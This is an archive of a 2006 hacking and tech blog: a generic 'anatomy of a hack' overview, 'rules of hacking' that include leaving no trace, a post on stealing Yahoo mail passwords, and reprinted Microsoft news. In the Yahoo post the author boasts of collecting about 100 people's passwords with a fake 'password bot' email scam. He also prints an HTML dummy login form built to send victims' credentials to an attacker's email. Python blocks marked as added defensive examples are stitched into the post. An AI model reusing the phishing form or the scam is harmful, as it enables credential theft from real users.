Friday, March 31, 2006

Anatomy Of Hack

There are some generic steps that a hacker follows to break into a private network. In this article I describe a generic approach that has long been followed by most hackers around the world. Today's private networks are hardened and well secured from the outside, so it is very difficult for a hacker to get in. But once he finds a small hole in the corporate firewall, he can certainly get into the network, because the rest of the internal network is very soft. This is like an eggshell, which is very hard on the outside but very soft on the inside.
Footprinting
The first step that a hacker follows is footprinting, where he identifies the target that he needs to attack. In this step he finds the list of available computers that can be hacked. He may enumerate the computers present on his network, or he may get the IP address of the target system by some other means. He may get the IP address of the target system from an internal employee.


Scanning
In the second step the hacker scans the target system. For example, he scans its ports and finds the MAC address of the target system.

Information Gathering
The third step of hacking is information gathering. In this stage the hacker tries to get as much information as possible about the target system. He finds the operating system running on the target machine, the services running on it that can be exploited, and much more. This is also the step where the hacker can find user names that probably have a blank password or a password that can be easily guessed.

Gaining Access

Gaining access is the step that follows the information gathering phase. The hacker gains access to the target machine by means of some exploit, which may be the blank or default password of some user, or an application vulnerability such as a buffer overflow, which hackers have used most of the time to gain access to vulnerable machines. In the past, access has been gained using many techniques, including XSS (cross-site scripting) and SQL injection attacks.

Escalating Privilege
When the access gained in the previous step is not privileged enough, the hacker tries to escalate his privileges by exploiting an application-level vulnerability. This is one of the most difficult phases of hacking.

Pilfering
Once the hacker has the right privileges on the target machine, he starts pilfering the required information from it. In this phase the hacker may harm the target machine.


Denial of Service
When the hacker is not able to gain access to the target machine, or is not able to escalate his privileges, he attacks the system with a denial of service. The hacker does this when he gets frustrated by how hard the system is. It does not benefit the hacker in any sense.

Reference
http://www.microsoft.com/technet/technetmag/issues/2005/01/AnatomyofaHack/




Rule of Hacking

There are some rules I believe must be followed when you are hacking.
Follow these don'ts and do's of hacking.

Don'ts of Hacking
  1. Do not do it the same way as others do.
  2. Do not use a tool for hacking unless you know completely how it works.
  3. Do not leave any trace.
  4. Do not delete or change any data in a way that can harm or cause loss to the victim. (Ethically, do not harm your victim.)
Do's of Hacking
  1. Do it in all possible ways.

Wednesday, March 29, 2006

Yahoo Hacking Bot


Hi Guys,
Today I am going to discuss what I did last week. Before that, let me tell you that I am very much interested in hacking. I mean I want to learn the hacking techniques that were used in the past by other hackers. As part of this, last week I was searching for the techniques that hackers have used to hack online web mail accounts like Yahoo.

So I googled and found very few techniques that were used. Most of the techniques were already known to me, like key-loggers, dummy pages and social engineering. Last week, using the social engineering technique, I got the passwords of nearly 100 people on the net. Now let me tell you how these three techniques work and how you can defend yourself.

Key-Loggers

Key loggers are a very cheap kind of hacking utility used by script kiddies. A key logger is software that logs every key press on a particular machine. By recording the keys, it can capture the password for any kind of form-based authentication scheme, irrespective of the authentication technique used by the server program. Form-based authentication means a scheme that takes a user name and password from the user.

So maybe your friend will install a key logger on your machine while you are away from it (and it is left open). Key loggers can also be present on Internet café machines.

Dummy Pages

Dummy pages are false login pages that look very similar to the original page but have a different action value. That is, a dummy page is a fake HTML form whose method is set to POST and whose action is configured so that when you submit the information it is sent to some e-mail ID. You may try to log in on such a page, and your password will be posted to your friend's (the hacker's) e-mail.

Here is a simple example of a dummy page:



<form action="Your SMTP URL" method="POST">
<input type="Hidden" name="to" value="Your email Id">
<input type="Hidden" name="subject" value="Subject of email ">
<input type="text" name="user" value="">
<input type="text" name="pass" value="">
<input type="submit" name="submitbutton" value="">
</form>
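From the defender's side, the markers of such a page can be checked mechanically. The following is an added example, not code from the original post: it flags login forms whose action leaves the trusted host, that collect the password in a plain text field, or that carry hidden mail-relay fields. The function names, field-name lists and example hosts are assumptions.

```python
from html.parser import HTMLParser
from urllib.parse import urlparse

CRED_NAMES = {"pass", "passwd", "password", "pwd"}  # assumed field names
MAIL_FIELDS = {"to", "subject"}  # hidden fields a form-to-mail relay expects

class FormCollector(HTMLParser):  # records each form's action and inputs
    def __init__(self):
        super().__init__()
        self.forms, self._cur = [], None
    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "form":
            self._cur = {"action": a.get("action") or "", "inputs": []}
        elif tag == "input" and self._cur is not None:
            kind, name = a.get("type") or "text", a.get("name") or ""
            self._cur["inputs"].append((kind.lower(), name.lower()))
    def handle_endtag(self, tag):
        if tag == "form" and self._cur is not None:
            self.forms.append(self._cur)
            self._cur = None

def audit_login_forms(html, page_url, trusted_hosts):
    """Return a list of warnings for every credential-taking form."""
    collector = FormCollector()
    collector.feed(html)
    page, results = urlparse(page_url), []
    for form in collector.forms:
        inputs = form["inputs"]
        if not any(t == "password" or n in CRED_NAMES for t, n in inputs):
            continue  # no credential field, so not a login form
        target, warnings = urlparse(form["action"]), []
        # A relative action is submitted to the host that served the page.
        host = target.hostname or ("" if target.scheme else page.hostname) or ""
        if host not in trusted_hosts:
            warnings.append("action posts to untrusted host")
        if not any(t == "password" for t, _ in inputs):
            warnings.append("password typed into a non-masked field")
        if any(t == "hidden" and n in MAIL_FIELDS for t, n in inputs):
            warnings.append("hidden mail-relay fields present")
        results.append(warnings)
    return results

# Constructed samples: the dummy form above with placeholder values, and a normal form.
DUMMY = ('<form action="http://mailer.example.net/send" method="POST">'
         '<input type="Hidden" name="to" value="x@example.net">'
         '<input type="text" name="user"><input type="text" name="pass"></form>')
GENUINE = ('<form action="/login" method="POST"><input type="text" name="user">'
           '<input type="password" name="passwd"></form>')
```
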


Social Engineering

The last method that I came across was social engineering, which deceives users by telling them a very easy method to hack Yahoo, described like this:

1. First send a letter to hack_mit_bot@yahoo.com, second within the
Subject heading place the word "Password".
2. Then in the text field place the YahooID of the person that you
want to hack in small letters.
3. Then place your own yahoo account information such as: "My
login:My password" (a semicolon makes it easier for the bot to
recognize). This way the bot can verify that your account actually
exists. And then supplies you with the password for the person's
account that you want it for. Here is example:

To: hack_mit_bot@yahoo.com
Cc:
Bcc:
Subject: Password

YourYahooID@yahoo.co.in:>

So all the people who want to hack someone's Yahoo ID will get hacked themselves.

Can you believe this? This method was posted on the internet a few years back, but I still got many idiots who sent me their passwords.

Reality

Anyone who claims that he can get your Yahoo password is either a damn fool or damn intelligent enough to really break the existing algorithms. I say this because the password stored on the Yahoo server is neither your plain password nor an encrypted password. It is the hash of your password, which cannot be decrypted back unless it is cracked by some brute-force attack. So, guys, even the Yahoo administrator cannot get your password.

But if someone is still hacking your Yahoo mail, it is entirely due to your own mistake. I mean either you logged in on a machine that has a keyboard logger, or you entered your password on some dummy page.

So be clever enough that no one can hack your password.
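The point in the Reality section about stored hashes can be shown in a few lines. This is an added example, not part of the original post and not Yahoo's actual scheme: it assumes a per-user random salt with PBKDF2-HMAC-SHA256, and shows that the stored record never contains the password, so the only way back is guessing, which succeeds only against weak passwords.

```python
import hashlib
import hmac
import os

ITERATIONS = 100_000  # assumed work factor for this illustration

def _derive(password, salt, iterations):
    return hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"), salt, iterations)

def make_record(password):
    """What the server keeps: a random salt and the derived hash only."""
    salt = os.urandom(16)
    return {"salt": salt.hex(), "iterations": ITERATIONS,
            "hash": _derive(password, salt, ITERATIONS).hex()}

def verify(candidate, record):
    """Re-derive from the candidate and compare in constant time."""
    digest = _derive(candidate, bytes.fromhex(record["salt"]), record["iterations"])
    return hmac.compare_digest(digest.hex(), record["hash"])

def first_match(record, guesses):
    """There is no decrypt step; return the guess that verifies, if any."""
    return next((g for g in guesses if verify(g, record)), None)

# Constructed data: a short list of common passwords and two sample accounts.
COMMON = ["123456", "password", "qwerty", "letmein"]
WEAK = make_record("qwerty")
STRONG = make_record("plum-Orbit-41-saddle")
```

Because each record has its own salt, two users with the same password get different hashes, so one guess cannot be checked against every account at once.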

Thursday, November 3, 2005

Windows Live

Microsoft's foray into hosted applications will have an initially minimal impact on the software vendor, but will certainly affect some of its main competitors, industry analysts told vnunet.com.
"This is more a swing of the pendulum," said Rob Helm, director of research at analyst firm Directions on Microsoft.
"In 2000 the pendulum was swinging towards hosted services. Two years later it was swinging back. Now Microsoft is going to make another run at it."
Microsoft unveiled its Live Software initiative on Tuesday at a media event in San Francisco. The strategy will see the launch of the new Office Live and Windows Live products.
Both are mostly free and supported by advertisements, and are offered as an online service through a browser.
Users will be able to access the applications on any device with a browser, ranging from mobile phones to PDAs and desktop PCs.
In the short term, however, the initiative will mostly be a rebranding of existing Microsoft services including Hotmail and MSN Messenger.
The two will be released under the Live Mail and Live Messenger brands respectively. Similarly Microsoft's Small Business Centre will become Office Live.
"It's mostly a branding change and an overall statement of direction," said Helm. But by making the services available free of charge and supported by advertisements, Microsoft is stepping up the competition with Google and Yahoo.
However, unlike Google and Yahoo, Microsoft does not rely solely on advertising revenues to stay in business. This not only makes it a low-risk bet for the software provider, but offers a shot at ruining Google's and Yahoo's business.
"Even if Microsoft doesn't win, it's possible for others to lose," said Helm.
Microsoft launched a big push towards hosted applications in 2000, but the doomed Hailstorm project faced many obstacles.
Users did not trust Microsoft, and the low adoption rate of broadband connections limited the appeal of software that required users to be constantly online. As the internet bubble burst, Microsoft quietly folded the initiative.
Trust will be a major hurdle for Microsoft once again, according to Charlene Li, principal analyst for devices, media and marketing at Forrester Research.

Friday, October 28, 2005

Microsoft's Another Tactic

US software colossus Microsoft announced plans on Wednesday to launch an online library of books and other written works.
A "beta" version of MSN Book Search will go into service online next year, Microsoft said in a written release.
"We are excited to be working with libraries worldwide to digitize and index information from the world's printed materials," said Christopher Payne, corporate vice president of MSN Search.
"We believe people will benefit from the ability to not just view a page, but to easily act on that data in contextually relevant ways, both online in the search experience and in the applications they are using," he said.
Microsoft will start its library with books in the public domain then expand it to include other works, according to the company.
Microsoft's digital text compilation will consist primarily of material that is not copyrighted and it will strive to work out deals with the owners of written works before including them in the online library, the company said.
Microsoft was evidently trying to avoid the kind of criticism and contention its Internet rival Google provoked with a plan to amass all the world's books in an online archive.
Google unveiled its project, "Google Print," in October last year.
Google suspended the plan in August after being lambasted internationally by authors, traditional libraries and publishing houses that claimed copyrights were being threatened.
Google's print production manager Adam Smith said at the time that Google would not scan any more copyrighted books until next month, to give publishers a chance to figure out what books they want kept from the planned online library.
In April, 19 European national libraries announced a multi-million euro counter-offensive aimed at blocking Google's quest to create a global virtual library.
The alliance, organized by France's national library, formed after Michigan University and four other top libraries -- Harvard, Stanford, New York Public Library and the Bodleian in Oxford -- made a deal with Google to digitize millions of their books and make them freely available online.
Google has consulted with publishers, authors and trade organizations to assuage concerns about copyrights, according to Smith.
Google invited publishers to provide lists of copyrighted works they want logged in the online library so the search engine can refer potential readers their way to buy the books in one form or another.
Google also offered to keep publishers and authors updated on interest in their books and share revenue from "contextual advertising."
The Google Print project rattled the cultural establishment in Paris, raising fears that French language and ideas could be just sidelined on the World Wide Web, already dominated by English.
French President Jacques Chirac, at one point, asked Culture Minister Renaud Donnedieu de Vabres and France's National Library president Jean-Noel Jeanneney to study how collections in libraries in France and Europe could be more widely and more rapidly distributed via Internet.
Jeanneney said at the time that Google's plan confirmed "the risk of a crushing American domination in the definition of how future generations conceive the world."
The alliance opposing Google's plan included national libraries in Austria, Belgium, the Czech Republic, Denmark, Estonia, Finland, France, Germany, Greece, Hungary, Italy, Lithuania, Luxembourg, the Netherlands, Poland, Slovenia, Slovakia, Spain and Sweden.